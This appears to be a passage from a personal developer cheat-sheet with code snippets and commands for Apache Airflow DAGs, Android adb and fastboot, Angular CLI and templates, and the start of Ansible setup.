         concurrency=1,
         default_args=DEFAULT_ARGS
         ) as dag:
    PythonOperator(task_id="image_set_variant",
                   python_callable=image_set_variant,
                   provide_context=True,
                   retries=3,
                   retry_delay=timedelta(seconds=30),
                   # retries=3,
                   # retry_delay=timedelta(seconds=30),
	           # https://github.com/apache/airflow/blob/866a601b76e219b3c043e1dbbc8fb22300866351/airflow/jobs/scheduler_job.py#L392
	           # priority_weight=1 default is 1, more high will be executed earlier
                   doc_md="this is doc for task")
# task concurrency
t1 = BaseOperator(pool='my_custom_pool', task_concurrency=12)
  • simple DAG
from airflow import DAG
from datetime import date, timedelta, datetime
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
# airflow predefined intervals
from airflow.utils.dates import days_ago

def _hook_failure(error_context):
  print(error_context)
  
  
# default argument for each task in DAG
default_arguments = {
    'owner': 'airflow'
    ,'retries': 1
    ,'retry_delay': timedelta(minutes=5)
    ,'email_on_failure':True
    ,'email_on_retry':True
    ,'email': "[email protected]" # smtp server must be set up
    ,'on_failure_callback': _hook_failure
}

# when schedule_interval=None, then execution of DAG possible only with direct triggering 
with DAG(dag_id='dummy_echo_dag_10'
          ,default_args=default_arguments
          ,start_date=datetime(2016,1,1) # do not do that: datetime.now() # days_ago(3)
          ,schedule_interval="*/5 * * * *"
    	  ,catchup=False # - will be overridden by the config file !!!
          ,depends_on_past=False
         ) as dag:
    # not necessary to specify dag=dag, source code inside BaseOperator:
    # self.dag = dag or DagContext.get_current_dag()
    BashOperator(task_id='bash_example', bash_command="date", dag=dag)    
value_from_rest_api_call='{{ dag_run.conf["session_id"] }}'
# or
kwargs['dag_run'].conf.get('session_id', 'default_value_for_session_id')
### connection 
#   Conn id: data_api_connection
# Conn Type: HTTP
#      Host: https://data-portal.devops.org
#     Extra: { "Content-Type": "application/json", "Cookie": "kc-access=eyJhbGci...."}

from datetime import timedelta, datetime

import os
from typing import Dict
from airflow.models import DAG
from airflow.operators.http_operator import SimpleHttpOperator
from airflow.operators.python import PythonOperator
from airflow.models.skipmixin import SkipMixin
import logging
import json

DAG_NAME = "data_api_call"
TASK_DATA_API_CALL = "data_api_call"
CONNECTION_ID = "data_api_connection"

def print_conf(**context):
    print(context)
    account_id=context["dag_run"].conf['account_id']
    print(f"account_id {account_id}")
    filename=context["dag_run"].conf['filename']
    print(f"filename {filename}")

# alternative way of reading input parameters
request_account="{{ dag_run.conf['account_id']  }}"

with DAG(DAG_NAME,
         description='collaboration with data api',
         schedule_interval=None,
         start_date=datetime(2018, 11, 1),
         catchup=False) as dag:

    def print_input_parameters():
        return PythonOperator(task_id="print_input_variables", python_callable=print_conf, provide_context=True)

    def data_api_call(connection_id=CONNECTION_ID):
        return SimpleHttpOperator(
            task_id=TASK_DATA_API_CALL
            , http_conn_id=CONNECTION_ID
            , method="GET"
            , endpoint=f"/session-lister/v1/version?{request_account}"
            # data="{\"id\":111333222}"
            # response will be pushed to xcom with COLLABORATION_TASK_ID
            # , xcom_push=True
            , log_response=True
            , extra_options={"verify": False, "cert": None}
        )

    print_input_parameters() >> data_api_call()
  • reading settings files ( dirty way )
# settings.json should be placed in the same folder as dag description
# configuration should contain: dags_folder = /usr/local/airflow/dags
def get_request_body():
    with open(f"{str(Path(__file__).parent.parent)}/dags/settings.json", "r") as f:
        request_body = json.load(f)
        return json.dumps(request_body)
COLLABORATION_TASK_ID="mydag_first_call"

def status_checker(resp):
    job_status = resp.json()["status"]
    return job_status in ["SUCCESS", "FAILURE"]

def cleanup_response(response):
    return response.strip()

def create_http_operator(connection_id=MYDAG_CONNECTION_ID):
    return SimpleHttpOperator(
        task_id=COLLABORATION_TASK_ID,
        http_conn_id=connection_id,
        method="POST",
        endpoint="v2/endpoint",
        data="{\"id\":111333222}",
        headers={"Content-Type": "application/json"},
        # response will be pushed to xcom with COLLABORATION_TASK_ID
        xcom_push=True,
        log_response=True,
    )


def second_http_call(connection_id=MYDAG_CONNECTION_ID):
    return HttpSensor(
        task_id="mydag_second_task",
        http_conn_id=connection_id,
        method="GET",
        endpoint="v2/jobs/{{ parse_response(ti.xcom_pull(task_ids='" + COLLABORATION_TASK_ID + "' )) }}",
        response_check=status_checker,
        poke_interval=15,
        depends_on_past=True,
        wait_for_downstream=True,
    )


with DAG(
    default_args=default_args,
    dag_id="dag_name",
    max_active_runs=1,
    default_view="graph",
    concurrency=1,
    schedule_interval=None,
    catchup=False,
    # custom function definition
    user_defined_macros={"parse_response": cleanup_response},
) as dag:
    first_operator = create_http_operator()
    second_operator = second_http_call()
    first_operator >> second_operator
  • avoid declaration of Jinja inside parameters
    # api_endpoint = "{{ dag_run.conf['session_id'] }}"
    maprdb_read_session_metadata = SimpleHttpOperator(
        task_id=MAPRDB_REST_API_TASK_ID,
        method="GET",
        http_conn_id="{{ dag_run.conf['session_id'] }}",
	# sometimes not working and need to create external variable like api_endpoint !!!!
        endpoint="{{ dag_run.conf['session_id'] }}",
        data={"fields": [JOB_CONF["field_name"], ]},
        log_response=True,
        xcom_push=True,
    )
  • logging, log output, print log
import logging
logging.info("some logs")
  • logging for task, task log
 task_instance = context['ti']
 task_instance.log.info("some logs for task")
  • execute list of tasks from external source, subdag, task loop
def trigger_export_task(session, uuid, config):
    def trigger_dag(context: Dict, dag_run: DagRunOrder) -> DagRunOrder:
        dag_run.payload = config
        return dag_run

    return AwaitableTriggerDagRunOperator(
        trigger_dag_id=DAG_ID_ROSBAG_EXPORT_CACHE,
        task_id=f"{session}_{uuid}",
        python_callable=trigger_dag,
        trigger_rule=TriggerRule.ALL_DONE,
    )

# DAG Definition
with DAG(
    dag_id=DAG_NAME_WARMUP_ROSBAG_EXPORT_CACHE,
    default_args={"start_date": datetime(2020, 4, 20), **DEFAULT_DAG_PARAMS},
    default_view="graph",
    orientation="LR",
    doc_md=__doc__,
    schedule_interval=SCHEDULE_DAILY_AFTERNOON,
    catchup=False,
) as dag:
    # generate export configs
    dag_modules = _get_dag_modules_containing_sessions()
    export_configs = _get_configs(dag_modules, NIGHTLY_SESSION_CONFIG)

    # generate task queues/branches
    NUM_TASK_QUEUES = 30
    task_queues = [[] for i in range(NUM_TASK_QUEUES)]

    # generate tasks (one task per export config) and assign them to queues/branches (rotative)
    for i, ((session, uuid), conf) in enumerate(export_configs.items()):
        queue = task_queues[i % NUM_TASK_QUEUES]
        queue.append(trigger_export_task(session, uuid, conf))

        # set dependency to previous task
        if len(queue) > 1:
            queue[-2] >> queue[-1]
with DAG(default_args=DAG_DEFAULT_ARGS,
         dag_id=DAG_CONFIG['dag_id'],
         schedule_interval=DAG_CONFIG.get('schedule_interval', None)) as dag:

    def return_branch(**kwargs):
        """
	start point (start task) of the execution 
	( everything else after start point will be executed )
	"""
        decision = kwargs['dag_run'].conf.get('branch', 'run_markerers')
        if decision == 'run_markerers':
            return 'run_markerers'
        if decision == 'merge_markers':
            return 'merge_markers'
        if decision == 'index_merged_markers':
            return 'index_merged_markers'
        if decision == 'index_single_markers':
            return 'index_single_markers'
        if decision == 'index_markers':
            return ['index_single_markers', 'index_merged_markers']
        else:
            return 'run_markerers'


    fork_op = BranchPythonOperator(
        task_id='fork_marker_jobs',
        provide_context=True,
        python_callable=return_branch,
    )

    run_markerers_op = SparkSubmitOperator(
        task_id='run_markerers',
        trigger_rule='none_failed',
    )

    merge_markers_op = SparkSubmitOperator(
        task_id='merge_markers',
        trigger_rule='none_failed',
    )

    index_merged_markers_op = SparkSubmitOperator(
        task_id='index_merged_markers',
        trigger_rule='none_failed',
    )

    index_single_markers_op = SparkSubmitOperator(
        task_id='index_single_markers',
        trigger_rule='none_failed',
    )

    fork_op >> run_markerers_op >> merge_markers_op >> index_merged_markers_op
    run_markerers_op >> index_single_markers_op
  • access to dag runs, access to dag instances, set dags state
from airflow.models import DagRun
from airflow.operators.python_operator import PythonOperator
from airflow.utils.db import provide_session
from airflow.utils.state import State
from airflow.utils.trigger_rule import TriggerRule

@provide_session
# custom parameter for operator 
def stop_unfinished_dag_runs(trigger_task_id, session=None, **context):
    print(context['my_custom_param'])
    dros = context["ti"].xcom_pull(task_ids=trigger_task_id)
    run_ids = list(map(lambda dro: dro.run_id, dros))

    # identify unfinished DAG runs of rosbag_export
    dr = DagRun
    running_dags = session.query(dr).filter(dr.run_id.in_(run_ids), dr.state.in_(State.unfinished())).all()

    if running_dags and len(running_dags)>0:
        # set status failed
        for dag_run in running_dags:
            dag_run.set_state(State.FAILED)
        print("set unfinished DAG runs to FAILED")


def dag_run_cleaner_task(trigger_task_id):
    return PythonOperator(
        task_id=dag_config.DAG_RUN_CLEAN_UP_TASK_ID,
        python_callable=stop_unfinished_dag_runs,
        provide_context=True,
        op_args=[trigger_task_id], # custom parameter for operator
    	op_kwargs={"my_custom_param": 5}
    )
  • python operator new style
from airflow.decorators import task
from airflow.operators.python import get_current_context
	
@task
def image_set_variant():
    context = get_current_context()
    task_instance = context["ti"]
	

with DAG(DAG_NAME,
         start_date=datetime(2015, 12, 1),
         catchup=False,
         schedule_interval=None
         ) as dag:
    image_set_variant()
  • trig and wait, run another dag and wait
from airflow.models import BaseOperator
from airflow.operators.dagrun_operator import DagRunOrder

from airflow_common.operators.awaitable_trigger_dag_run_operator import \
    AwaitableTriggerDagRunOperator
from airflow_dags_manual_labeling_export.ad_labeling_export.config import \
    dag_config


def _run_another(context, dag_run_obj: DagRunOrder):
    # config from parent dag run
    config = context["dag_run"].conf.copy()
    config["context"] = dag_config.DAG_CONTEXT
    dag_run_obj.payload = config

    dag_run_obj.run_id = f"{dag_config.DAG_ID}_triggered_{context['execution_date']}"
    return dag_run_obj


def trig_another_dag() -> BaseOperator:
    """
    trig another dag
    :return: initialized TriggerDagRunOperator
    """
    return AwaitableTriggerDagRunOperator(
        task_id="task_id",
        trigger_dag_id="dag_id",
        python_callable=_run_another,
        do_xcom_push=True,
    )
  • read input parameters from REST API call
DAG_NAME="my_dag"
PARAM_1="my_own_param1"
PARAM_2="my_own_param2"
ENDPOINT="https://prod.airflow.vantage.zur/api/experimental/dags/$DAG_NAME/dagRuns"
BODY='{"conf":{"parameter1":"'$PARAM_1'","parameter2":"'$PARAM_2'"}}'
curl --data-binary $BODY -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X POST $ENDPOINT
decision = context['dag_run'].conf.get('parameter1', 'default_value')

read system configuration

from airflow.configuration import conf
# Secondly, get the value somewhere
conf.get("core", "my_key")

# Possible, set a value with
conf.set("core", "my_key", "my_val")
  • sensor example
FileSensor(
  task_id="sensor_file",
  fs_conn_id="filesystem_connection_id_1", # Extras should have: {"path":"/path/to/folder/where/file/is/"}
  filepath="my_file_name.txt"
)
  • smart skip, skip task
from airflow.models import DAG
from airflow.operators.python_operator import BranchPythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.models.skipmixin import SkipMixin

class SelectOperator(PythonOperator, SkipMixin):

    def _substract_by_taskid(self, task_list, filtered_ids):
        return filter( lambda task_instance: task_instance.task_id not in filtered_ids, task_list);

    def execute(self, context):
        condition = super().execute(context)
        # self.skip(context['dag_run'], context['ti'].execution_date, downstream_tasks)

        self.log.info(">>>  SelectOperator")
        self.log.info(">>> Condition %s", condition)
        downstream_tasks = context['task'].get_flat_relatives(upstream=False)
	
        # self.log.info(">>> Downstream task_ids %s", downstream_tasks)
        # filtered_tasks = list(self._substract_by_taskid(downstream_tasks, condition))
        # self.log.info(">>> Filtered task_ids %s", filtered_tasks)
        # self.skip(context['dag_run'], context['ti'].execution_date, filtered_tasks)        
        
        self.skip_all_except(context['ti'], condition)
        self.log.info(">>>>>>>>>>>>>>>>>>>")

with DAG('autolabelling_example', description='First DAG', schedule_interval=None, start_date=datetime(2018, 11, 1), catchup=False) as dag:
    def fork_label_job_branch(**context):
        return ['index_single_labels']        

    fork_operator = SelectOperator(task_id=FORK_LABEL_TASK_ID, provide_context=True, python_callable=fork_label_job_branch)

providers vs extras

Providers

pip install apache-airflow-providers-presto

Plugins

official documentation
examples of airflow plugins

  • Operators: They describe a single task in a workflow. Derived from BaseOperator.
  • Sensors: They are a particular subtype of Operators used to wait for an event to happen. Derived from BaseSensorOperator
  • Hooks: They are used as interfaces between Apache Airflow and external systems. Derived from BaseHook
  • Executors: They are used to actually execute the tasks. Derived from BaseExecutor
  • Admin Views: Represent base administrative view from Flask-Admin allowing to create web interfaces. Derived from flask_admin.BaseView (new page = Admin Views + Blueprint )
  • Blueprints: Represent a way to organize flask application into smaller and re-usable application. A blueprint defines a collection of views, static assets and templates. Derived from flask.Blueprint (new page = Admin Views + Blueprint )
  • Menu Link: Allow to add custom links to the navigation menu in Apache Airflow. Derived from flask_admin.base.MenuLink
  • Macros: way to pass dynamic information into task instances at runtime. They are tightly coupled with Jinja Template.

plugin template

# __init__.py

from airflow.plugins_manager import AirflowPlugin
from elasticsearch_plugin.hooks.elasticsearch_hook import ElasticsearchHook

# Views / Blueprints / MenuLinks are instantied objects
class MyPlugin(AirflowPlugin):
	name 			= "my_plugin"
	operators 		= [MyOperator]
	sensors			= []
	hooks			= [MyHook]
	executors		= []
	admin_views		= []
	flask_blueprints	= []
	menu_links		= []
my_plugin/
├── __init__.py
├── hooks
│   ├── my_hook.py
│   └── __init__.py
├── menu_links
│   ├── my_link.py
│   └── __init__.py
├── operators
    ├── my_operator.py
    └── __init__.py

Maintenance

Metadata cleanup

-- https://github.com/teamclairvoyant/airflow-maintenance-dags/blob/master/db-cleanup/airflow-db-cleanup.py

-- "airflow_db_model": BaseJob.latest_heartbeat,
select count(*) from job where latest_heartbeat < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "airflow_db_model": DagRun.execution_date,
select count(*) from dag_run where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "airflow_db_model": TaskInstance.execution_date,
select count(*) from task_instance where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "airflow_db_model": Log.dttm,
select count(*) from log where dttm < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "age_check_column": XCom.execution_date,
select count(*) from xcom where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "age_check_column": SlaMiss.execution_date,
select count(*) from sla_miss where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "age_check_column": TaskReschedule.execution_date,
select count(*) from task_reschedule where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "age_check_column": TaskFail.execution_date,
select count(*) from task_fail where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- "age_check_column": RenderedTaskInstanceFields.execution_date,
select count(*) from rendered_task_instance_fields where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;


-----------------------------------------------------------------------------------------------------------
-- metadata redundant records check 
select count(*) from job where latest_heartbeat < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from dag_run where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from task_instance where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from log where dttm < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from xcom where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from sla_miss where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from task_reschedule where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from task_fail where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
select count(*) from rendered_task_instance_fields where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

-- metadata cleanup database cleaning										       
delete from job where latest_heartbeat < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
delete from dag_run where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
delete from task_instance where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
delete from log where dttm < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
delete from xcom where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
delete from sla_miss where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
delete from task_reschedule where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
delete from task_fail where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;
delete from rendered_task_instance_fields where execution_date < (CURRENT_DATE - INTERVAL '5 DAY')::DATE;

Issues

404 during REST API request

the response page contains: <title>Airflow 404 = lots of circles</title>

solution: in airflow.cfg change auth_backend from airflow.api.auth.backend.default to airflow.api.auth.backend.basic_auth

Architecture examples

shopify
e-commerce
celery worker on AWS
airflow-centric solution

Android development cheat sheet

connect phone to a computer ( Linux )

to read links like mtp://motorola_moto_g52_xxxxxx: Settings -> Connected devices -> USB

  • Use USB for: File Transfer
  • Optional: USB controlled by connected device

PC software for managing Android device

Odin

Odin for Linux

  1. install heimdall
    ubuntu_version=$(lsb_release -rs | cut -d. -f1)
    if [ "$ubuntu_version" -ge 22 ]; then 
        sudo apt install heimdall-flash heimdall-flash-frontend
        heimdall print-pit
    fi
  2. download release of JOdin3 and run JOdin3CASUAL
    soft; mkdir odin3; cd odin3
    wget https://github.com/GameTheory-/jodin3/releases/download/v1.0/Jodin3.zip
    unzip Jodin3.zip
    ls -la Jodin3/JOdin3CASUAL

Android Debug Bridge creates a connection ( bridge ) between the device and the computer. It must be activated first:

  1. developer mode Settings -> About phone -> build number -> type 5 times on it
  2. USB debug Settings -> find word "develop" -> activate "USB debugging"

adb install via Debian APT

sudo apt -y install adb
adb version
adb devices

copy files

adb push test.apk /sdcard
adb pull /sdcard/demo.mp4 e:\

restart device in recovery mode

adb reboot
adb reboot recovery

list of all applications/packages

adb shell pm list packages -f
# list of all installed applications with name of packages
adb shell pm list packages -f | awk -F '.apk=' '{printf "%-60s | %s\n", $2, $1}' | sort
# list of all non-system/installed applications
# | grep -v "package:/system" | grep -v "package:/vendor" | grep -v "package:/product" | grep -v "package:/apex"
adb shell pm list packages -f | awk -F '.apk=' '{printf "%-60s | %s\n", $2, $1}' | grep "package:/data/app/" | sort

# package_name=org.mozilla.firefox
# x-www-browser https://play.google.com/store/search?q=${package_name}&c=apps

# adb shell; 
# pm list packages -f

permission by package

PACKAGE_NAME=com.google.android.youtube
adb shell dumpsys package $PACKAGE_NAME | grep -i permission | grep -i granted=true

list of all permissions

adb shell pm list permissions

list of all features

adb shell pm list features
# print one file from OS
adb shell cat /proc/cpuinfo

# https://source.android.com/docs/core/architecture/bootloader/locking_unlocking
adb shell getprop | grep oem
adb shell getprop sys.oem_unlock_allowed
adb shell setprop sys.oem_unlock_allowed 1
# dmesg -wH

list of all settings

adb shell service list
adb shell settings list --user current secure 
adb shell settings get secure location_providers_allowed
adb shell settings get secure enabled_accessibility_services

send keyboard event

adb shell input keyevent KEYCODE_HOME

# KEYCODE_A: A
# KEYCODE_B: B
# KEYCODE_ENTER: Enter
# KEYCODE_SPACE: Space
# KEYCODE_BACK: Back button
# KEYCODE_HOME: Home button

fastboot works only in "bootloader" / "fastboot" / "download" mode; boot your Android device into bootloader mode first

fastboot install via Debian APT

sudo apt -y install fastboot
fastboot version

check connected phone

sudo apt install adb 

adb devices

lsusb
# Bus 001 Device 013: ID 04e8:6860 Samsung Electronics Co., Ltd Galaxy A5 (MTP)

fix issue with root:root usb access

ls -l /dev/bus/usb/001/013
# crw-rw-r--+ 1 root plugdev 189, 10 Mai 21 13:50 /dev/bus/usb/001/011

# if group is root, not a plugdev
sudo vim /etc/udev/rules.d/51-android.rules
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", ATTR{idProduct}=="6860", MODE="0660", GROUP="plugdev", SYMLINK+="android%n"

sudo service udev status

decompilation, opening Android apk

download latest release

GIT_ACCOUNT=skylot
GIT_PROJECT=jadx
version=`wget -v https://github.com/${GIT_ACCOUNT}/${GIT_PROJECT}/releases/latest/download/$GIT_RELEASE_ARTIFACT 2>&1 | grep following | awk '{print $2}' | awk -F '/' '{print $8}'`
GIT_RELEASE_ARTIFACT=jadx-${version:1}.zip
wget -v https://github.com/${GIT_ACCOUNT}/${GIT_PROJECT}/releases/latest/download/$GIT_RELEASE_ARTIFACT

start gui

./bin/jadx-gui

adb usage

print all applications with full set of granted permissions

for each_app in `adb shell pm list packages -f | grep 'package:/data/app' | awk -F 'base.apk=' '{print $2}' | sort `; do
    echo ">>> $each_app"
    # each_app=com.google.android.youtube
    # adb shell pm dump $each_app | clipboard
    adb shell pm dump $each_app | awk '/runtime permissions:/,/disabledComponents:/ { if ($0 ~ /disabledComponents:/ || $0 ~ /enabledComponents:/) exit; else print }' | grep "granted=true"
    echo ""
done

Angular cheat sheet

install nodejs

# download and unpack to $destination_folder https://nodejs.org/en/
destination_folder=/home/soft/node2
wget -O node.tar.xz https://nodejs.org/dist/v10.16.3/node-v10.16.3-linux-x64.tar.xz
tar -xf node.tar.xz -C $destination_folder
# update /etc/environment with $destination_folder

npm config

$HOME/.npmrc - another way to extend settings per user

# list of configuration
npm config list
# full config list with default settings
npm config ls -l
# set proxy 
npm config set proxy http://<username>:<pass>@proxyhost:<port>
npm config set https-proxy http://<uname>:<pass>@proxyhost:<port>

docker container with Angular attached to your current folder to build your application

+---------+
| source  +-----------+
|  /app   |           |
+----^----+    +------v----+
     V         | docker:   |
     |         | * node    |
     |         | * angular |
 +---+---+     +-----+-----+
 | dest  |           |
 | build <-----------+
 +-------+
  1. build your docker with dependencies
NODE_VERSION=16.15.0
    # NODE_VERSION=latest # you can select last version for it
docker pull node:$NODE_VERSION 
docker run --entrypoint="" --rm --name "npm_angular" --interactive --tty node:$NODE_VERSION  /bin/sh 

    # (optional)
    # ------- inside container -------
    ## install angular 
npm install -g @angular/cli    
npm install -g @angular/cli@12
    # check your installation 
ng --version

    ## install typescript
npm install -g typescript  
tsc --version

    ## install yarn
npm install --global yarn
yarn --version
  2. (optional) save your docker container with installed artifacts
DOCKER_IMAGE_ANGULAR=node-with-angular
# in another terminal 
CONTAINER_ID=`docker ps | grep 'npm_angular' | awk '{print $1}'`
echo $CONTAINER_ID
docker commit $CONTAINER_ID $DOCKER_IMAGE_ANGULAR
docker images
  3. start the saved container in your application folder ( the folder with package.json )
DOCKER_IMAGE_ANGULAR=node-with-angular
docker run --entrypoint="" --interactive --tty -p 4200:4200  -v `pwd`:/app $DOCKER_IMAGE_ANGULAR  /bin/sh 
  4. build application inside your container
    # after step 3.
PATH_TO_PROJECT_LOCAL=/app
    # ls -la $PATH_TO_PROJECT_LOCAL/package.json
cd $PATH_TO_PROJECT_LOCAL
sudo rm -rf node_modules

npm install
    # /usr/local/lib/node_modules/npm/bin/npm 
    # npm build # for version<6.x.x
npm pack

Start of application

core conceptions

  • modular architecture
    • Angular architecture patterns
    • Scalable Angular application architecture
  • one way data-flow
    • Angular data flow best practices
    • Uni-directional flow in Angular
    • Advantages of one way binding
  • directives
    • Angular attribute directives
    • Angular structural directives
    • Angular structural directive patterns
  • components lifecycle
    • Angular life cycle hook
    • Component life cycle
  • http services
    • JavaScript observable patterns
    • Angular HTTP and observables
    • ES7 observable feature
  • smart/dumb components
    • Smart/dumb Angular components
    • Stateless dumb components
    • Presentational components
    • Smart components in Angular
  • application structure
    • Single repo Angular apps
    • Angular libraries
    • Angular packages
    • Angular bundles
    • Angular micro apps
    • Monorepo
  • property binding
    • Angular property binding
    • Angular event binding
    • Angular two-way binding
    • Angular interpolation
    • Angular passing constants
  • feature modules
    • Angular feature modules
    • Shared feature structures in Angular
    • Feature module providers
    • Lazy loading with routing and feature modules
  • forms
    • Angular form validation
    • Template driven validation
    • Reactive form validation
    • Sync and async validators in Angular
    • Built-in validators
    • Angular custom validators
    • Cross-field validation
  • projection
    • Angular content projection
    • Angular parent-child view relationship
    • Angular view data relationships
  • onPush
    • Angular onPush change detection
  • route access restrictions
    • Angular route guards
    • Angular authentication patterns
    • Angular preloading and lazy-loading modules
    • Angular secured route patterns
  • Angular custom pipes
  • decorators
    • Angular decorators
    • Viewchild and contentchild in Angular
    • Angular component data sharing
    • Angular directives patterns
    • @Host, @HostBinding and exportAs in Angular
  • dynamic components
    • Dynamic components in Angular
    • Dynamic components and ng-templating
  • manage state of application
    • Angular RxJs
    • Flux/Redux principles
    • Angular state management principles
  • Dependency injection
    • Angular zones
    • Angular DI

angular cli

create new project

ng new my-new-project

start a project

cd my-new-project
# open the just-generated project in VS Code:  code .
# start locally 
ng serve
# start on specific port
ng serve --port 2222
# start and open browser
ng serve --open

build a project

ng build
ng build --prod
ng build --prod --base-href http://your-url
ng g component my-new-component
ng generate component my-new-component

create service

  • generate by cli
    ng generate service myService
  • create dummy data "src/app/my-service.service.ts"
    data=[9,8,7,6,5]
  • update "src/app/app.module.ts"
    import { MyServiceService } from './my-service.service';
    ...
    providers: [MyServiceService],
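a minimal sketch of the dummy-data service from the list above ( file and class names follow the CLI defaults for "ng generate service myService" ):

import { Injectable } from '@angular/core';

@Injectable()
export class MyServiceService {
  // dummy data exposed to components that inject this service
  data: number[] = [9, 8, 7, 6, 5];
}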

using it in model "src/app/my-component/my-component.component.ts"

import { MyServiceService } from '../my-service.service';
...
template: `
  <div>{{ this.externalService.data }}</div>
  <div>{{ this.mydata }}</div>
`,
...
export class MyComponentComponent implements OnInit{
mydata:number[]
  ngOnInit(): void {
    this.mydata = this.externalService.data
  }
  constructor(private externalService:MyServiceService){}
}

angular templates

inline template

@Component({
  selector: 'app-my-component',
  // templateUrl: './my-component.component.html',
  template: `
  <b>my-component</b> <br/>
  `,
  styleUrls: ['./my-component.component.css']
})

for loop

@Component({
  selector: 'app-my-component',
  template: `
  <b>my-component</b> <br/>
  <i>is working inline ->{{description.title+"   "+description.values}}<- </i>
  <ul>
    <li *ngFor="let each of description.values; let index = index">{{ index }} {{ each }}</li>
  </ul>
  `,
  styleUrls: ['./my-component.component.css']
})

export class MyComponentComponent {
  description:object

  constructor() { 
    this.description={
      title: "my custom properties",
      values: [5,7,9,11,13]
    }
    
  }
}

alternative template

@Component({
  selector: 'app-my-component',
  template: `
  <div *ngIf="description.customTemplate==true; else myAnotherTemplate">{{ description.values}}</div>  

  <ng-template #myAnotherTemplate>
    <ul><li *ngFor="let each of description.values"> {{ each }} </li></ul>
  </ng-template>
  `,
  styleUrls: ['./my-component.component.css']
})

export class MyComponentComponent {
  description:object
  constructor() { 
    this.description={
      title: "my custom properties",
      customTemplate: false,
      values: [5,7,9,11,13]      
    }    
  }

}

Property binding

Component --data--> View

<img src="{{ myProperty }}" >

<img [src]="myProperty" >
<button [disabled]="myProperty=='not-active-now'" >

<img bind-src="myProperty" >

Events binding

View --event--> Component

@Component({
  selector: 'app-my-component',
  template: `
    <button (click)="myEvent($event)">click event</button>
  `,
  styleUrls: ['./my-component.component.css']
})

export class MyComponentComponent {
  myEvent(event:MouseEvent){
    console.log(event)
    window.alert(event)
  }
}

Styles

inline style

@Component({
  selector: 'app-my-component',
  template: `
    <button>my button</button>
  `,
  styles: [`
   button {
     font-weight: bold;
     color: red;
   }
  `]
})

Animation

installation

 npm install @angular/animations@latest --save

component

import { trigger, state, style, transition, animate, keyframes } from '@angular/animations'

@Component({
  selector: 'app-root',
  templateUrl: './app.component.html',
  styleUrls: ['./app.component.css'],
  animations: [
    trigger('myOwnAnimation',
            [
            state('small', style({transform: 'scale(1)'})),
            state('bigger', style({transform: 'scale(2)'})),
            transition(
              'small <=> bigger', 
              animate('300ms', style({transform: 'translateY(100px)'}))
            )
            ]
    )
  ]
})
export class AppComponent {
  state: string = "small"
  animateMe(){
    this.state = (this.state === 'small'? 'bigger' : "small")
  }
}

template

    <p [@myOwnAnimation]='state'  (click)="animateMe()" style="text-align: center"> animation</p>

Test

execute single test

ng test --include='**/service/*.spec.ts'
npm run test -- --include='**/service/*.spec.ts'

UX tools

  • Axure (Prototyping)
  • Sketch (UI Design)
  • Adobe Illustrator

agentless, connect via ssh to remote machine(s)

installation

yum install ansible
apt install ansible
pip3 install ansible 
# for python2 - default installation 
pip install ansible

the remote machine should have 'python' installed; otherwise set 'gather_facts: False' ( or 'gather_facts: no' )
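a minimal sketch of a play that skips fact gathering ( the raw module works even without python on the target ):

- hosts: all
  gather_facts: false
  tasks:
    - name: check connectivity without facts
      ansible.builtin.raw: uname -a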

uninstall

rm -rf $HOME/.ansible
rm -rf $HOME/.ansible.cfg
sudo rm -rf /usr/local/lib/python2.7/dist-packages/ansible
sudo rm -rf /usr/local/lib/python2.7/dist-packages/ansible-2.5.4.dist-info
sudo rm -rf /usr/local/bin/ansible
sudo rm -rf /usr/local/bin/ansible-config
sudo rm -rf /usr/local/bin/ansible-connection
sudo rm -rf /usr/local/bin/ansible-console
sudo rm -rf /usr/local/bin/ansible-doc
sudo rm -rf /usr/local/bin/ansible-galaxy
sudo rm -rf /usr/local/bin/ansible-inventory
sudo rm -rf /usr/local/bin/ansible-playbook
sudo rm -rf /usr/local/bin/ansible-pull
sudo rm -rf /usr/local/bin/ansible-vault
sudo rm -rf /usr/lib/python2.7/dist-packages/ansible
sudo rm -rf /usr/local/lib/python2.7/dist-packages/ansible

ansible configuration places

  • environment variables
  • ansible.cfg file:
    • env variable with file $ANSIBLE_CONFIG ( point out to ansible.cfg )
    • ~/.ansible.cfg
    • /etc/ansible/ansible.cfg
# show current config file 
ansible-config view
# description of all ansible config variables
ansible-config list
# dump current configuration values
ansible-config dump

configuration for external roles

filename: ~/.ansible.cfg

[defaults]
roles_path = ~/repos/project1/roles:~/repos/project2/roles

configuration for aws for skipping check host key

[defaults]
host_key_checking = false

check configuration

ansible-config view

inventory

without inventory inline host ip

ansible all -i desp000111.vantage.zur, --user=my_user -m "ping" -vvv

without inventory with pem ssh private ssh key

generate PEM file

